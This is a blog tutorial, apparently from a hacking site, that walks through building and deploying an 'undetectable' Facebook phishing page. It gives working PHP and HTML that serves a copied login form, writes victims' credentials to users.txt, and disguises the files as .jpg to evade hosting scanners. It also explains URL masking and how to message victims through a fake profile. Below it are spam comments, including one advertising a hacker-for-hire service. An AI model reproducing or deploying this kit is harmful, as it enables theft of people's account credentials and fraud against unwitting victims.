Create Undetectable Facebook Phishing Site - Advanced
What is Phishing Attack? How to secure Yourself from phishing attack

How to create undetectable facebook phishing page!, this is a big topic in now a days and i got many questions about this topic, so today i want to show a solution for this. in this tutorial i will explain the whole process to make phishing page undetectable including how to bypass security check of free hosting site to avoid account suspension , URL masking/hiding, and how to send it to victim.
In normal scenario when you design your phishing page and upload files to your hosting account, your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account but here you have the real solution for this problem.
In normal scenario when you design your phishing page and upload files to your hosting account, your Web Hosting provider attempts to find all phishing attempts from their servers, Maximum time they do this by using automated crawlers. If the crawler find any Forbidden character in your uploaded files. Sometimes they may contact you directly to remove the phishing files.
If they receive notification, they will remove the files automatically and notify you that your website contained phishing files and may suspend your account but here you have the real solution for this problem.
If you are newbie to facebook phishing then i suggest you to read my previous article: How To Hack Facebook Using Phishing Method-Basic
Warning & Disclaimer: Making a phishing page is not illegal, but using a phishing page is illegal. This tutorial is just to show you, “How to create phishing page?”. If you use this to hack anyone account, then I AM not responsible for it. Do anything on your own risk.
This tutorial has 3 main steps:
- Creating undetectable facebook phishing page
- Create an account in free web hosting site and upload the phisher files
- Url Masking/Hiding and send it to victim
So Lets’s Start,
I prefer newbies to follow the step by step guide, so you can learn how phishing works. If you don’t want to create yourself a phishing page then you can Download attachment file here(facebookdesktop.zip) or Alternate downloadand move to Step: 2
I prefer newbies to follow the step by step guide, so you can learn how phishing works. If you don’t want to create yourself a phishing page then you can Download attachment file here(facebookdesktop.zip) or Alternate downloadand move to Step: 2
Step 1: Creating undetectable facebook phishing page
First go to facebook home page (www.facebook.com) then, Right click > Save as and Save it as ‘login.html‘.
Now you will get two files (login_files folder and login.html).
now right click on ‘login.html‘ and open with notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with ‘data.php‘ .
(there is 3 ‘method’ and lot of ‘actions’ in the file when you search, but you have to replace the first method and the action behind that)
Again search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with ‘get’ and save it.
Rename the ‘login.html‘ to ‘login.jpg‘ (jpg files will bypass the free hosting security check).
Now we have to create another web page with .jpg extension. i am already prepared a simple page so copy the below code and paste it in notepad and save the file as ‘follow.jpg‘
<!DOCTYPE html><html> <head> <title>Find your Facebook ID – a 5-second easy tool for locating your Facebook numeric personal ID</title> <meta name=”description” content=”If you need to know your Facebook numeric peronal ID, just plug your Profile URL into this simple tool.” /> <link rel=”stylesheet” href=”reset.css” type=”text/css” media=”screen”> <link rel=”stylesheet” href=”style.css” type=”text/css” media=”screen”> <script src=”http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js”></script> <script src=”script.js” type=”text/javascript” charset=”utf-8″></script> <meta property=”fb:admins” content=”1146295886″ /> </head> <body> <form action=”” method=”post“> <label for=”fb_profile_url” class=”text-input-label fb_profile_url-text-input-label”> Enter your personal Facebook profile URL: </label> <input type=”text” name=”fb_profile_url” value=”” class=”nr-text” size=”45″ placeholder=”http://www.facebook.com/YourProfileName” /> <input type=”hidden” name=”unsanitized” class=”nr-hidden hidden-input-for-unsanitized” /> <p> <input type=”submit” value=”Lookup numeric ID…” class=”button-primary”> </p> <h1>Easily find your Facebook numeric personal ID for fb:admins social plugins and more!</h1> <p id=”description”> For integrations of certain Facebook social plugins, like the “Like” button and “Like box”, and others, Facebookrequires that you know your Facebook numeric user ID. Unfortunately, they make this very difficult to find, especiallyif you have a so-called “vanity” personalized profile URL. If you can’t find your Facebook ID, or don’t know what it isand need it, just enter your full Facebook profile URL in the above form, and we can scrape the ID from the code of yourpersonal profile page.</p></form><script type=”text/javascript”> var _gaq = _gaq || []; _gaq.push([‘_setAccount’, ‘UA-3361652-13’]); _gaq.push([‘_trackPageview’]); (function() { var ga = document.createElement(‘script’); ga.type = ‘text/javascript’; ga.async = true; ga.src = (‘https:’ == document.location.protocol ? ‘https://ssl’ : ‘http://www’) + ‘.google-analytics.com/ga.js’; var s = document.getElementsByTagName(‘script’)[0]; s.parentNode.insertBefore(ga, s); })();</script> </body></html>
Read more at http://picateshackz.com/2015/12/undetectable-facebook-phishing-page.html#SjV4YUelXmH4KuLd.99
Read more at http://picateshackz.com/2015/12/undetectable-facebook-phishing-page.html#SjV4YUelXmH4KuLd.99
Next you copy below code and paste it in notepad and save it as ‘index.php‘.
<?php$id = $_GET[“id”];if ($id == “facebookdesktop“) { $myFile = “login.jpg“; $fh = fopen($myFile, ‘r’); $theData = fread($fh, 500000); fclose($fh); echo $theData;}else{ $myFile1 = “follow.jpg“; $fh1 = fopen($myFile1, ‘r’); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1;}?>
Now you have to create another php file, so copy the below code and save it as ‘data.php‘.
:<?phpheader(“Location: https://m.facebook.com/login.php?&e=1348092&email=”);$handle = fopen(“users.txt“, “a”);foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);fwrite($handle, $value);fwrite($handle, “rn”);}fwrite($handle, “rn”);fclose($handle);exit;?>
At last we have to create a txt file to store victim’s username and password, so make a blank txt file and save it as ‘users.txt‘.
If you followed all the above steps carefully, you will have 6 files including 1 folder and It will look similar to this :
Now select all files and create a zip of it (any name in my case it is ‘facebookdesktop.zip‘). Click here to download attachment
Note: make sure all the 6 files are inside the .zip file
Step 2: Create an account in free web hosting site and upload the phisher files
I prefer 000.webhost.com.
Go to: https://members.000webhost.com/signup and fill out the information needed and click on Create My Account.
Open your email and verify the account you will see the active domain in your account ,then click on Go to CPanel (highlighted in below screen shot).
Now open the first file manager icon under File managers section.
Go to “public_html” folder and delete the 2 files inside it. then click on “upload“.
Below “Archives” section click on “Choose file“.
Select the zip file Which you have created above (In our case it is ‘facebookdesktop.zip’).
Click on the “green tick“.
Done!!!, Now what will happen,when your hosting provider will test your content they will get a innocent php file reading another file.and when they try will to access “login.jpg” file they will get an invalid/corrupted image.
Now Access your URL with this id at end (/?id=facebookdesktop)
Example: “www.yourdomain.sub.com/?id=facebookdesktop/“(See the Screenshot below)
When victim enter the email and and password in this link it will be stored in our ‘users.txt‘ file, to see that click the view button next to users.txt file.
Inside users.txt file you can see the victim’s email and password (highlighted part in below screen shot).
Step 3: Url Masking/Hiding and send it to victim
Before sharing it with your friends, You have to hide the URL. That way it can be less suspicious. so here we use Dot TK url Shortening. your actual Phishing url can create a sense of doubt in victim’s mind, we can hide the url. Dot.tk is an online service which enables you to hide/mask the url.
1. So, go to http://www.dot.tk/en/index.html?lang=en to hide a url.2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (our Phisher link:www.yourdomain.sub.com/?id=facebookdesktop/)3. Enter the link you want to rename your phisher link to dot.tk domain name.
1. So, go to http://www.dot.tk/en/index.html?lang=en to hide a url.2. Select shorten URL then enter your phisher link in the textbox and hit on Next. (our Phisher link:www.yourdomain.sub.com/?id=facebookdesktop/)3. Enter the link you want to rename your phisher link to dot.tk domain name.
(our domain: yourdomain)
Now we have the phishing url shortened like belove:
www.yourdomain.sub.com/?id=facebookdesktop = Yourdomain.tk
Now, you can send this masked phisher link to your victim.The victim will now find our phisher link less suspicious as we have hidden the actual phisher link using .tk domain.
Now its time to send the message to the victim facebook inbox mind it that you cant send message in inbox if you are not friend of victim so to do that first create a fake facebook profile and open the victims facebook account
then click select ‘report’ after that select this timeline is using a fake name then click continue.
then click select ‘report’ after that select this timeline is using a fake name then click continue.
Now select message to resolve this erase the previous message.
Now type your message with phisher link (yourdomain.tk) and this message will go in inbox of victim account.
Thank you, If you have any problem in this tutorial just comment here.
Download 5 Diffrant websites Theam in Only 3$
Only For First 50 User Get it Now And 100% Refund In 15 Days
Use This Coupon Code To Get 50% Off
H8FYAJFZWK
Magnificent beat ! I would like to apprentice at the
ReplyDeletesame time as you amend your website, how can i subscribe for a
weblog web site? The account aided me a acceptable deal.
I had been tiny bit familiar of this your broadcast offered vivid transparent idea
I was suggested this blog by my cousin. I'm not sure
ReplyDeletewhether this post is written by means of him as nobody else realize such specific approximately my trouble.
You are amazing! Thank you!
Hello! Would you mind if I share your blog with my facebook group?
ReplyDeleteThere's a lot of people that I think would really enjoy your content.
Please let me know. Thanks
I like what you guys are up too. Such clever work and exposure!
ReplyDeleteKeep up the wonderful works guys I've added you
guys to our blogroll.
Magnificent beat ! I would like to apprentice while you amend your website, how can i subscribe for a blog website?
ReplyDeleteThe account helped me a acceptable deal. I had been a little
bit acquainted of this your broadcast offered bright clear concept
Acessa peⅼo smartphone e transfere pra TV, é jeito.
ReplyDeleteIt's the best time to make some plans forr the future and it is time to
ReplyDeletebe happy.I've read this poat and if I could I desire to suggest you some interesting things
or tips. Perhapss you could write next articles referring to this article.
I desire tto read even more things about it!
Hi there mates, how is the whole thing, and what
ReplyDeleteyou want to say about thijs article, in my view its
actually remarkable for me.
Thanks for every other informative blog. The place else may I am getting that kind of info written in such
ReplyDeletea perfect manner? I've a mission that I'm simply now running on, and I've been at the look
out for such info.
Don't forget your pc and internet connections have to be sound,
ReplyDeletestable and reliable. No doubt there are occassions when gambling results in a fun and exciting experience from your welcomed adrenaline rush similar to skiing fanatics going downhill
at 80 mph. Mike Caro himself revealed in the Poker1 article that his system removes your house edge by not letting
the player place a bet at all.
excellent put up, very informative. I'm wondering why the
ReplyDeleteopposite experts of this sector don't notice this.
You should proceed your writing. I'm sure, you've a huge readers' base already!
Heya sou pela primeira vez aqui. Eu encontrado esta placa e eu encontrá-lo
ReplyDeleterealmente útil e isso me ajudou muito . Espero
poder dar algo de volta e ajudar outros como você auxiliado me.
Some really nice stuff on this web site, I it.
ReplyDeleteAs I web site possessor I believe the content matter here
ReplyDeleteis rattling magnificent , appreciate it for your hard work.
You should keep it up forever! Best of luck.
Wonderful paintings! This is the kind of information that are meant to be
ReplyDeleteshared across the web. Disgrace on the seek engines for now not positioning this post higher!
Come on over and consult with my website . Thank you =)
Heya i am for the first time here. I came across this board and I find It
ReplyDeletetruly helpful & it helped me out a lot. I am hoping to
offer something again and help others such as you helped me.
Everyone loves it when folks come together and share thoughts.
ReplyDeleteGreat site, stick with it!
Very good info. Lucky me I came across your website by accident (stumbleupon).
ReplyDeleteI've bookmarked it for later!
Howdy! I could have sworn I've been to this site before but after browsing through a few
ReplyDeleteof the posts I realized it's new to me. Anyways, I'm definitely
pleased I found it and I'll be book-marking it and checking back often!
This professional hacker is absolutely reliable and I strongly recommend him for any type of hack you require. I know this because I have hired him severally for various hacks and he has never disappointed me nor any of my friends who have hired him too, he can help you with any of the following hacks:
ReplyDelete-Phone hacks (remotely)
-Credit repair
-Bitcoin recovery (any cryptocurrency)
-Make money from home (USA only)
-Social media hacks
-Website hacks
-Erase criminal records (USA & Canada only)
-Grade change
Email: onlineghosthacker247 AT GMAIL DOT COM